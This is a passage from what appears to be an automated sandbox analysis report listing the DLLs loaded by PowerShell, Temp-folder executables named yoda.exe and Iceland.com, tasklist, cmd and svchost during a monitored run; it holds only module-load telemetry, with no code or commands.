Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yoda.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll

